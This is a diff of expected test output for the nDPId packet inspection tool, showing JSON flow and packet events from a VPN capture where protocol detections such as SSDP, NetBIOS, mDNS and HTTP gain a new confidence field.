 01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1569687271764,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"ts_msec":1569687271764,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA48i24MsCCjOhSFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MzEgR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687271764,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"ts_msec":1569687271764,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1569687277139,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1569687277139,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABgVbYAAEARDvYKAADjCgAA\/wCJAIkATLhJRX8wEAABAAAAAAABIEVNRkFDTkZDRUxFRkZDRkZGQ0NORVBGREZJQ0FDQUFBAAAgAAHADAAgAAEAAAAAAAZgAAoAAOM="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1569687277144,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1569687277144,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABOK\/AAAEAROM4KAADjCgAA\/wCJAIkAOvmHRYABEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="}
 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1569687277188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1569687277188,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABgQ9oAAEARINIKAADjCgAA\/wCJAIkATMRRRYEwEAABAAAAAAABIEVNRkFDTkVDREFERUREREFERkREQ05GSERIREdERUFBAAAgAAHADAAgAAEAAAAAAAZgAAoAAOM="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1569687281158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687281158,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0UBJAAPMGvOUIJWfECgAA4wG73ieGjW4CDCXQ8YARTdYkXAAAAQEICnincgAcDdF\/"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1569687286917,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1569687286917,"pkt":"AQBeAAD7pHczjPFACABFAABEAABAAP8RkBgKAACV4AAA+xTpFOkAMI4UAAAAAAABAAAAAAAAC19nb29nbGV6b25lBF90Y3AFbG9jYWwAAAwAAQ=="}
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}}
+00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2588,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1569687286918,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"ts_msec":1569687286918,"pkt":"AQBeAAD7pHczjPFACABFAABpAABAAP8Rj\/MKAACV4AAA+xTpFOkAVS3HAAAAAAABAAAAAAAAJDc5ZDg4ZTgzLTcyNWMtYjcxYi1iYWQwLTU4NjJkNWIyMjM4NgtfZ29vZ2xlem9uZQRfdGNwBWxvY2FsAAAhAAE="}
-00701{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2588,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"79d88e83-725c-b71b-bad0-5862d5b22386._googlezone._tcp.local"}}
+00727{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2588,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"79d88e83-725c-b71b-bad0-5862d5b22386._googlezone._tcp.local"}}
 00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2589,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1569687286918,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"ts_msec":1569687286918,"pkt":"AQBeAAD7pHczjPFACABFAAD+AABAAP8Rj14KAACV4AAA+xTpFOkA6vJcAACEAAAAAAEAAAADC19nb29nbGV6b25lBF90Y3AFbG9jYWwAAAwAAQAAAHgAJyQ3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODbADMAuABCAAQAAEZQAOCNpZD0yMERGOEZENkYzMTU5MUQyMDUwNEE5RkQ5OThDMzlFRRNfX2NvbW1vbl90aW1lX189MXwwwC4AIYABAAAAeAAtANIA8ycRJDc5ZDg4ZTgzLTcyNWMtYjcxYi1iYWQwLTU4NjJkNWIyMjM4NsAdwKsAAYABAAAAeAAECgAAlQ=="}
-00666{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2589,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}}
+00692{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2589,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}}
 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1569687287737,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":16,"ts_msec":1569687287737,"pkt":"AQBeAAABLH6BsEqhCABFwAAkGHoAAAEBtp0KAAAB4AAAAQkA5rYBAgVGCgAAAQAAAAAAAP\/\/Aiw="}
-00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":1.061278}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687268559,"flow_last_seen":1569687271560,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":1.061278}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687268559,"flow_last_seen":1569687271560,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687269223,"flow_last_seen":1569687272080,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}}
-00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00609{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00609{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1569687277139,"flow_last_seen":1569687283186,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":912,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687269223,"flow_last_seen":1569687272080,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":311,"midstream":0,"ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
